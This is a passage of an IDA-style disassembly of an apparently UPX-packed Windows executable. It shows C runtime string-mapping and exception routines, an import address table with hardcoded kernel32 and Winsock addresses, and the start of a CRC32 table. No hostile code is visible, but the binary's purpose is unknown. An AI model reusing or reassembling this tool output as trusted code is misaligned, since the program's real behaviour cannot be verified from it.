locret_4268CB: ; CODE XREF: sub_4268B6+A�j
retn
sub_4268B6 endp
; =============== S U B R O U T I N E =======================================
sub_4268CC proc near ; DATA XREF: UPX0:00427D6C�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_4268D8
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_4268D8: ; CODE XREF: sub_4268CC+5�j
retn
sub_4268CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4268D9 proc near ; CODE XREF: sub_426573+37�p
; sub_42669A+3E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_427D88
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_42705C ; RaiseException
pop edi
pop esi
leave
retn 8
sub_4268D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426913 proc near ; CODE XREF: sub_426762+56�p
; sub_426762+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_426925
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_426925: ; CODE XREF: sub_426913+B�j
cmp ds:dword_4DBA14, 0
jnz short loc_42693F
cmp ax, 41h
jb short locret_426986
cmp ax, 5Ah
ja short locret_426986
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_42693F: ; CODE XREF: sub_426913+19�j
cmp ax, 100h
jnb short loc_426959
push 1
push eax
call sub_426BC1
pop ecx
test eax, eax
pop ecx
jnz short loc_426959
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_426959: ; CODE XREF: sub_426913+30�j
; sub_426913+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push ds:dword_4DBA14
call sub_426988
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_426986
mov ax, [ebp+var_2]
locret_426986: ; CODE XREF: sub_426913+1F�j
; sub_426913+25�j ...
leave
retn
sub_426913 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426988 proc near ; CODE XREF: sub_426913+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427DA8
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp ds:dword_4DBC6C, esi
jnz short loc_4269FE
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_427938
mov edi, 100h
push edi
push esi
call dword_427050 ; LCMapStringW
test eax, eax
jz short loc_4269DC
mov ds:dword_4DBC6C, ebx
jmp short loc_4269FE
; ---------------------------------------------------------------------------
loc_4269DC: ; CODE XREF: sub_426988+4A�j
push esi
push esi
push ebx
push offset dword_4CB50C
push edi
push esi
call dword_427054 ; LCMapStringA
test eax, eax
jz loc_426B7D
mov ds:dword_4DBC6C, 2
loc_4269FE: ; CODE XREF: sub_426988+2E�j
; sub_426988+52�j
cmp [ebp+arg_C], esi
jle short loc_426A13
push [ebp+arg_C]
push [ebp+arg_8]
call sub_426B91
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_426A13: ; CODE XREF: sub_426988+79�j
mov eax, ds:dword_4DBC6C
cmp eax, 1
jnz short loc_426A3A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427050 ; LCMapStringW
jmp loc_426B7F
; ---------------------------------------------------------------------------
loc_426A3A: ; CODE XREF: sub_426988+93�j
cmp eax, 2
jnz loc_426B7D
cmp [ebp+arg_18], esi
jnz short loc_426A50
mov eax, ds:dword_4DBA24
mov [ebp+arg_18], eax
loc_426A50: ; CODE XREF: sub_426988+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call dword_42717C ; WideCharToMultiByte
mov [ebp+var_20], eax
cmp eax, esi
jz loc_426B7D
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_426A96
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_426A96: ; CODE XREF: sub_426988+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_426B7D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call dword_42717C ; WideCharToMultiByte
test eax, eax
jz loc_426B7D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427054 ; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_426B7D
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_426B19
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_426B19: ; CODE XREF: sub_426988+17D�j
cmp ebx, esi
jz short loc_426B7D
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427054 ; LCMapStringA
test eax, eax
jz short loc_426B7D
test byte ptr [ebp+arg_4+1], 4
jz short loc_426B57
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_426B79
cmp eax, edi
jl short loc_426B48
mov eax, edi
loc_426B48: ; CODE XREF: sub_426988+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_41B5F0
add esp, 0Ch
jmp short loc_426B79
; ---------------------------------------------------------------------------
loc_426B57: ; CODE XREF: sub_426988+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_426B60
push esi
push esi
jmp short loc_426B66
; ---------------------------------------------------------------------------
loc_426B60: ; CODE XREF: sub_426988+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_426B66: ; CODE XREF: sub_426988+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
call dword_427180 ; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_426B7D
loc_426B79: ; CODE XREF: sub_426988+1B8�j
; sub_426988+1CD�j
mov eax, edi
jmp short loc_426B7F
; ---------------------------------------------------------------------------
loc_426B7D: ; CODE XREF: sub_426988+66�j
; sub_426988+B5�j ...
xor eax, eax
loc_426B7F: ; CODE XREF: sub_426988+AD�j
; sub_426988+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_426988 endp
; =============== S U B R O U T I N E =======================================
sub_426B91 proc near ; CODE XREF: sub_426988+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_426BB0
loc_426BA1: ; CODE XREF: sub_426B91+1D�j
cmp word ptr [eax], 0
jz short loc_426BB0
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_426BA1
loc_426BB0: ; CODE XREF: sub_426B91+E�j
; sub_426B91+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_426BBE
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_426BBE: ; CODE XREF: sub_426B91+24�j
mov eax, edx
retn
sub_426B91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426BC1 proc near ; CODE XREF: sub_426913+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_426C01
cmp [ebp+arg_0], 100h
jnb short loc_426BE5
movzx eax, [ebp+arg_0]
mov ecx, off_43C9DC
mov ax, [ecx+eax*2]
jmp short loc_426C08
; ---------------------------------------------------------------------------
loc_426BE5: ; CODE XREF: sub_426BC1+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_426C13
add esp, 18h
test eax, eax
jnz short loc_426C05
loc_426C01: ; CODE XREF: sub_426BC1+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_426C05: ; CODE XREF: sub_426BC1+3E�j
mov eax, [ebp+var_4]
loc_426C08: ; CODE XREF: sub_426BC1+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_426BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C13 proc near ; CODE XREF: sub_426BC1+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427DC0
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4DBC70
xor edi, edi
cmp eax, edi
jnz short loc_426C82
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_427938
push esi
call dword_427020 ; GetStringTypeW
test eax, eax
jz short loc_426C60
mov eax, esi
jmp short loc_426C7D
; ---------------------------------------------------------------------------
loc_426C60: ; CODE XREF: sub_426C13+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4CB50C
push esi
push edi
call dword_427024 ; GetStringTypeA
test eax, eax
jz loc_426DC4
push 2
pop eax
loc_426C7D: ; CODE XREF: sub_426C13+4B�j
mov ds:dword_4DBC70, eax
loc_426C82: ; CODE XREF: sub_426C13+2F�j
cmp eax, 1
jnz short loc_426C9E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427020 ; GetStringTypeW
jmp loc_426DC6
; ---------------------------------------------------------------------------
loc_426C9E: ; CODE XREF: sub_426C13+72�j
cmp eax, 2
jnz loc_426DC4
cmp [ebp+arg_10], edi
jnz short loc_426CB4
mov eax, ds:dword_4DBA24
mov [ebp+arg_10], eax
loc_426CB4: ; CODE XREF: sub_426C13+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call dword_42717C ; WideCharToMultiByte
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_426DC4
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_41B590
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_426D12
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_426D12: ; CODE XREF: sub_426C13+EA�j
cmp [ebp+var_2C], edi
jz loc_426DC4
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call dword_42717C ; WideCharToMultiByte
test eax, eax
jz loc_426DC4
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_426D67
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_426D67: ; CODE XREF: sub_426C13+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_426DC4
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_426D7B
mov eax, ds:dword_4DBA14
loc_426D7B: ; CODE XREF: sub_426C13+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
call dword_427024 ; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_426DC4
cmp word ptr [esi], 0FFFFh
jnz short loc_426DC4
push edi
push ebx
push [ebp+arg_C]
call sub_41CC90
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_426DC6
; ---------------------------------------------------------------------------
loc_426DC4: ; CODE XREF: sub_426C13+61�j
; sub_426C13+8E�j ...
xor eax, eax
loc_426DC6: ; CODE XREF: sub_426C13+86�j
; sub_426C13+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_426C13 endp
; =============== S U B R O U T I N E =======================================
sub_426DD8 proc near ; DATA XREF: UPX0:00427F74�o
; FUNCTION CHUNK AT 0040D4A9 SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_40D4A9
sub_426DD8 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_426DF6
mov ecx, [ebp+8]
jmp loc_40D4A9
; ---------------------------------------------------------------------------
locret_426DF6: ; CODE XREF: UPX0:00426DE8�j
retn
; ---------------------------------------------------------------------------
loc_426DF7: ; DATA XREF: sub_40D07D�o
mov eax, offset dword_427F48
jmp loc_41C91F
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_40D4A9
; ---------------------------------------------------------------------------
loc_426E0C: ; DATA XREF: UPX0:00427FA4�o
lea ecx, [ebp-1Ch]
jmp loc_40D4A9
; ---------------------------------------------------------------------------
loc_426E14: ; DATA XREF: sub_40D21F�o
mov eax, offset dword_427F78
jmp loc_41C91F
; ---------------------------------------------------------------------------
align 10h
loc_426E20: ; DATA XREF: sub_40D78C�o
mov eax, offset dword_427FA8
jmp loc_41C91F
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_4268B6
; ---------------------------------------------------------------------------
loc_426E32: ; DATA XREF: sub_4264FE�o
mov eax, offset dword_428008
jmp loc_41C91F
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40D4A9
; ---------------------------------------------------------------------------
loc_426E44: ; DATA XREF: sub_426573�o
mov eax, offset dword_4280A0
jmp loc_41C91F
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_4268B6
; ---------------------------------------------------------------------------
loc_426E56: ; DATA XREF: sub_4265D0�o
mov eax, offset dword_4280C4
jmp loc_41C91F
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_4268B6
; ---------------------------------------------------------------------------
loc_426E68: ; DATA XREF: sub_426618�o
mov eax, offset dword_4280E8
jmp loc_41C91F
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40D4A9
; ---------------------------------------------------------------------------
loc_426E7A: ; DATA XREF: sub_42669A�o
mov eax, offset dword_428148
jmp loc_41C91F
; ---------------------------------------------------------------------------
dd 5Fh dup(0)
dword_427000 dd 77E75D9Eh ; DATA XREF: sub_40F96B+201�r
; sub_416DC9+26�r
dword_427004 dd 77E6BD68h ; DATA XREF: sub_4261AB+173�r
dword_427008 dd 77E77F2Eh ; DATA XREF: sub_425F03+3E�r
; sub_425F03+261�r
dword_42700C dd 77E762D0h ; DATA XREF: sub_425F03+5B�r
; sub_425F03+B9�r
dword_427010 dd 77E70192h ; DATA XREF: sub_424F0A+F9�r
dword_427014 dd 77E7176Ch ; DATA XREF: sub_4247A8+8�r
dword_427018 dd 77E7339Ch ; DATA XREF: sub_424770+C�r
dword_42701C dd 77E7C9E7h ; DATA XREF: sub_424752+5�r
; sub_424763+6�r
dword_427020 dd 77E7C866h ; DATA XREF: sub_423CEC+3F�r
; sub_423CEC+12D�r ...
dword_427024 dd 77E641EBh ; DATA XREF: sub_423CEC+59�r
; sub_423CEC+8D�r ...
dword_427028 dd 77E73FF9h ; DATA XREF: sub_4238DF+2C�r
dword_42702C dd 77E7FF2Eh ; DATA XREF: sub_4237B1:loc_423801�r
; sub_423828:loc_42387B�r
dword_427030 dd 77E78406h ; DATA XREF: sub_423302+FF�r
; sub_423302+166�r ...
dword_427034 dd 77E79C3Dh ; DATA XREF: sub_423302+158�r
; sub_4235C9+143�r
dword_427038 dd 77E7C931h ; DATA XREF: sub_423302+19D�r
dword_42703C dd 77E77EE1h ; DATA XREF: sub_4231D0+9�r
dword_427040 dd 77E67702h ; DATA XREF: sub_4231D0:loc_4231FF�r
; sub_4231D0+E1�r
dword_427044 dd 77E7C9E1h ; DATA XREF: sub_4231D0+CE�r
dword_427048 dd 77E9C5B1h ; DATA XREF: sub_4231D0+11F�r
dword_42704C dd 77EB9A84h ; DATA XREF: sub_422CEE+138�r
dword_427050 dd 77E781F9h ; DATA XREF: sub_422ACA+42�r
; sub_422ACA+14D�r ...
dword_427054 dd 77E77405h ; DATA XREF: sub_422ACA+5E�r
; sub_422ACA+A7�r ...
dword_427058 dd 77F522F2h ; DATA XREF: sub_422608+58�r
dword_42705C dd 77E6D706h ; DATA XREF: sub_4210AC+215�r
; sub_4268D9+2E�r
dword_427060 dd 77E6C703h ; DATA XREF: sub_420042+1A�r
dword_427064 dd 77E75CB5h ; DATA XREF: sub_40111D+DF�r
; sub_401221+7A�r ...
dword_427068 dd 77E77963h ; DATA XREF: sub_40111D+B8�r
; sub_401221+2DB�r ...
dword_42706C dd 77E61BB8h ; DATA XREF: sub_40111D+A7�r
; sub_401221+2C3�r ...
dword_427070 dd 77E7A099h ; DATA XREF: sub_40111D+83�r
; sub_401221+DA�r ...
dword_427074 dd 77E704FCh ; DATA XREF: sub_40111D+74�r
; sub_401221+C4�r ...
dword_427078 dd 77E61BE6h ; DATA XREF: sub_40111D+29�r
; sub_401221+1F4�r ...
dword_42707C dd 77E7AC37h ; DATA XREF: sub_401221+3C1�r
; sub_401ACD+7BB�r ...
dword_427080 dd 77E73628h ; DATA XREF: sub_401221+33B�r
; sub_401ACD+7872�r ...
dword_427084 dd 77E706B7h ; DATA XREF: sub_401221+274�r
; sub_417276+15�r ...
dword_427088 dd 77E80656h ; DATA XREF: sub_401221+267�r
dword_42708C dd 77F5157Dh ; DATA XREF: sub_401221+1D8�r
; sub_401221+3E6�r ...
dword_427090 dd 77E6BD13h ; DATA XREF: sub_401221:loc_4013DC�r
dword_427094 dd 77E70396h ; DATA XREF: sub_401221+1B5�r
; sub_401221+221�r ...
dword_427098 dd 77E74CABh ; DATA XREF: sub_401221+19E�r
; sub_40F6B4+110�r ...
dword_42709C dd 77E79F93h ; DATA XREF: sub_401221+D3�r
; sub_409B13+2�r ...
dword_4270A0 dd 77E79D5Bh ; DATA XREF: sub_401221+6B�r
; sub_401221+311�r ...
dword_4270A4 dd 77E7C2C4h ; DATA XREF: sub_401221+64�r
dword_4270A8 dd 77E7751Ah ; DATA XREF: sub_401221+2C�r
; sub_401ACD+2561�r ...
dword_4270AC dd 77E75CEBh ; DATA XREF: sub_401ACD+7AD8�r
; sub_40B232+2B�r ...
dword_4270B0 dd 77E6AD34h ; DATA XREF: sub_401ACD+69AC�r
; sub_41835A+35�r
dword_4270B4 dd 77E71AFEh ; DATA XREF: sub_401ACD+6776�r
dword_4270B8 dd 77E805D8h ; DATA XREF: sub_409B13+13A�r
; sub_409B13:loc_40A021�r ...
dword_4270BC dd 77E7A5FDh ; DATA XREF: sub_409B13+11�r
; sub_416F1B+60�r ...
dword_4270C0 dd 77E65F4Ch ; DATA XREF: UPX0:0040ADF7�r
; sub_419594+34�r
dword_4270C4 dd 77E7513Ch ; DATA XREF: UPX0:0040AE8E�r
dword_4270C8 dd 77E7C657h ; DATA XREF: UPX0:0040AF02�r
; sub_4184E2+32�r ...
dword_4270CC dd 77E73C49h ; DATA XREF: sub_40B162+4A�r
; sub_40B8A2+1AF�r ...
dword_4270D0 dd 77F7E300h ; DATA XREF: sub_40C125+142�r
dword_4270D4 dd 77F7E21Fh ; DATA XREF: sub_40C125+D7�r
dword_4270D8 dd 77E7C706h ; DATA XREF: sub_40C33D+77�r
dword_4270DC dd 77F53275h ; DATA XREF: sub_40C33D+6B�r
; sub_40C33D+22F�r
dword_4270E0 dd 77E79D8Ch ; DATA XREF: sub_40D8AE+94�r
; sub_40D99C+181�r ...
dword_4270E4 dd 77E737DEh ; DATA XREF: sub_40D99C+43A�r
dword_4270E8 dd 77E78B82h ; DATA XREF: sub_40D99C+1A9�r
; sub_40D99C+499�r ...
dword_4270EC dd 77E7A837h ; DATA XREF: sub_40D99C+A7�r
; sub_40F6B4+1CB�r ...
dword_4270F0 dd 77E616B4h ; DATA XREF: sub_40E504+19B�r
; sub_410CD6+115�r ...
dword_4270F4 dd 77E79CE3h ; DATA XREF: sub_40E504+111�r
; sub_410F20+77�r ...
dword_4270F8 dd 77E79C90h ; DATA XREF: sub_40E504+FD�r
; sub_40E504+10A�r ...
dword_4270FC dd 77E7727Ah ; DATA XREF: sub_40E504+74�r
; sub_410E27+23�r ...
dword_427100 dd 77E64106h ; DATA XREF: sub_40F531+A0�r
; sub_41AA43+1B6�r
dword_427104 dd 77E64006h ; DATA XREF: sub_40F531+8C�r
; sub_41AA43+19F�r
dword_427108 dd 77E793EFh ; DATA XREF: sub_40F6B4+1F5�r
; sub_40FFF1+38�r ...
dword_42710C dd 77E78EAAh ; DATA XREF: sub_40F96B+5EC�r
; sub_416DC9+C0�r ...
dword_427110 dd 77E79424h ; DATA XREF: sub_40F96B+280�r
; sub_417276+135�r
dword_427114 dd 77E794BFh ; DATA XREF: sub_40F96B+272�r
; sub_417276+123�r
dword_427118 dd 77E75E67h ; DATA XREF: sub_40F96B+212�r
; sub_40F96B+5DB�r ...
dword_42711C dd 77E78C81h ; DATA XREF: sub_40FFF1+6C�r
; sub_415E1B+259�r ...
dword_427120 dd 77E76968h ; DATA XREF: sub_410A4E+5F�r
dword_427124 dd 77E74C59h ; DATA XREF: sub_410CD6+C7�r
dword_427128 dd 77EC7C51h ; DATA XREF: sub_4110AB+5E�r
dword_42712C dd 77E70F89h ; DATA XREF: sub_411C14+E�r
; sub_4151AD+D�r ...
dword_427130 dd 77E802FCh ; DATA XREF: sub_412B09+18C�r
; sub_412B09+2D4�r ...
dword_427134 dd 77E6D75Bh ; DATA XREF: sub_412B09+182�r
; sub_41386C+FF�r
dword_427138 dd 77E80618h ; DATA XREF: sub_416F1B+170�r
; sub_4185A5+D4�r
dword_42713C dd 77E78147h ; DATA XREF: sub_416F1B+BC�r
dword_427140 dd 77F51597h ; DATA XREF: sub_4170ED+41�r
; sub_4170ED+F5�r ...
dword_427144 dd 77F516F8h ; DATA XREF: sub_4170ED+21�r
; sub_417276+4A�r ...
dword_427148 dd 77E77CB7h ; DATA XREF: sub_4170ED+10�r
; sub_417276+40�r ...
dword_42714C dd 77E7F01Ah ; DATA XREF: sub_417276+88�r
; sub_41741D+55�r
dword_427150 dd 77E61A54h ; DATA XREF: sub_417276+56�r
; sub_41741D+97�r
dword_427154 dd 77E7C3A5h ; DATA XREF: sub_417276+34�r
; sub_41741D+2E�r
dword_427158 dd 77E76A60h ; DATA XREF: sub_41814D+2D�r
dword_42715C dd 77E71B14h ; DATA XREF: sub_4181D7+26�r
dword_427160 dd 77E7166Fh ; DATA XREF: sub_4181D7+1D�r
dword_427164 dd 77E75090h ; DATA XREF: sub_418212+69�r
dword_427168 dd 77E74D76h ; DATA XREF: sub_418212+36�r
dword_42716C dd 77E77797h ; DATA XREF: sub_418212+25�r
dword_427170 dd 77E7011Ah ; DATA XREF: sub_418294+96�r
dword_427174 dd 77E73CE2h ; DATA XREF: sub_418294+60�r
dword_427178 dd 77E668D9h ; DATA XREF: sub_41835A+15D�r
dword_42717C dd 77E79924h ; DATA XREF: sub_418B59+13�r
; sub_422ACA+20D�r ...
dword_427180 dd 77E77CCEh ; DATA XREF: sub_418C2B+F�r
; sub_41D834+54�r ...
dword_427184 dd 77E76A2Eh ; DATA XREF: sub_4196BD+DE�r
dword_427188 dd 77E7FF65h ; DATA XREF: sub_419B10+5A�r
dword_42718C dd 77EB7624h ; DATA XREF: sub_419B10+3D�r
dword_427190 dd 77E6C29Dh ; DATA XREF: sub_41A19E+1EB�r
dword_427194 dd 77E76C1Ah ; DATA XREF: sub_41AA43+1CF�r
dword_427198 dd 77F5722Fh ; DATA XREF: sub_41B202+110�r
; sub_41B202+22D�r ...
dword_42719C dd 77F6183Eh ; DATA XREF: sub_42675C�r
dword_4271A0 dd 77E76E3Dh ; DATA XREF: sub_41D081+6C�r
; sub_4247EC+38�r
dword_4271A4 dd 77E61608h ; DATA XREF: sub_41D081+17�r
dword_4271A8 dd 77E6177Ah ; DATA XREF: UPX0:0041D9D2�r
; sub_423302+59�r
dword_4271AC dd 77E7C938h ; DATA XREF: UPX0:0041D9A7�r
dword_4271B0 dd 77E7C486h ; DATA XREF: UPX0:0041D959�r
dword_4271B4 dd 77E7AC5Eh ; DATA XREF: sub_41DC8A+54�r
dword_4271B8 dd 77E76E0Bh ; DATA XREF: sub_41DDD2+50�r
dword_4271BC dd 77E7C726h ; DATA XREF: sub_41DDD2+11�r
dword_4271C0 dd 77E79E34h ; DATA XREF: sub_41DEA2+240�r
; sub_41E976+120�r ...
dword_4271C4 dd 77E7980Ah ; DATA XREF: sub_41E4D4+76�r
; sub_41E585+51�r ...
dword_4271C8 dd 77E73196h ; DATA XREF: sub_42478C+C�r
dword_4271CC dd 77E7849Fh ; DATA XREF: sub_41FEA9+48�r
; sub_4200E8+14�r ...
dword_4271D0 dd 77E7A13Fh ; DATA XREF: sub_420042+2F�r
align 8
dword_4271D8 dd 71B2ACCBh ; DATA XREF: sub_426750�r
align 10h
dword_4271E0 dd 71AB4122h ; DATA XREF: sub_414B46+D4�r
dword_4271E4 dd 71AB1746h ; DATA XREF: sub_412661+1DE�r
dword_4271E8 dd 71AB401Ch ; DATA XREF: sub_412661+21B�r
; sub_412661+243�r
dword_4271EC dd 71AB1836h ; DATA XREF: sub_40EFBF+6E�r
; sub_40F03C+8E�r
dword_4271F0 dd 71AB41DAh ; DATA XREF: sub_40E992+4A�r
; sub_40EFBF+15�r
dword_4271F4 dd 71AB3F8Dh ; DATA XREF: sub_40E992+5A�r
dword_4271F8 dd 71AB155Ah ; DATA XREF: sub_40E992+8D�r
; sub_4136C6+70�r ...
dword_4271FC dd 71AB3ECEh ; DATA XREF: sub_40E992+B5�r
dword_427200 dd 71AB5DE2h ; DATA XREF: sub_40E992+C9�r
dword_427204 dd 71AB868Dh ; DATA XREF: sub_40E992+171�r
dword_427208 dd 71AB5A01h ; DATA XREF: sub_414C2F+20�r
dword_42720C dd 71AB12F8h ; DATA XREF: sub_40DEA1+27�r
; sub_40DFE3+27�r ...
dword_427210 dd 71AB1746h ; DATA XREF: sub_40DEA1+36�r
; sub_40DFE3+36�r ...
dword_427214 dd 71AB3E5Dh ; DATA XREF: sub_40DEA1+59�r
; sub_40DFE3+59�r ...
dword_427218 dd 71AB5690h ; DATA XREF: sub_40DEA1+6A�r
; sub_40DFE3+6A�r ...
dword_42721C dd 71AB1A6Dh ; DATA XREF: sub_40DEA1+E0�r
; sub_40DFE3+E0�r ...
dword_427220 dd 71AB3C22h ; DATA XREF: UPX0:0040D389�r
; sub_40DEA1+45�r ...
dword_427224 dd 71AB1AF4h ; DATA XREF: sub_40CFDF+12�r
; sub_40DEA1+C3�r ...
dword_427228 dd 71AB1890h ; DATA XREF: sub_40CE41+4C�r
; sub_40E992+106�r
dword_42722C dd 71AB1B7Bh ; DATA XREF: sub_426756�r
dword_427230 dd 71AB157Eh ; DATA XREF: sub_401ACD+2FA9�r
align 8
dword_427238 dd 0 ; DATA XREF: sub_401070+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
